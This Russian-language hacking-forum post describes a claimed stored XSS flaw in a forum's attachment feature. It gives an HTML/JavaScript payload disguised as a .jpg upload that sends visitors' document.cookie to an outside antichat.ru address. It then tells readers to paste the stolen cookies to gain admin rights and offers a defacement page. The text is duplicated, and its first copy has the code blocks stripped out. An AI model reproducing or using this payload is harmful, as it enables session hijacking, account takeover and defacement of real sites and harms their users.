Моя уязвимость, я её нашёл.
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим
После вставки в сообщение будет ссылка наподобии этой:
или так нагляднее:
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
И вставляем куки себе. И ты админ.
Можно поприкалываться и так:
[CODE]
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим
| Код |
|---|
<html> <head> <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> </head> </html> |
После вставки в сообщение будет ссылка наподобии этой:
| Код |
|---|
http://forum.site.ru/index.php?t=getfile&id=2723&private=0 |
или так нагляднее:
| Код |
|---|
http://forum.site.ru/index.php?t=getfile&id=2723 |
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
И вставляем куки себе. И ты админ.
Можно поприкалываться и так:
| Код |
|---|
<html> <head> <h1>Defaced by HiMiC</h1> </head> </html> |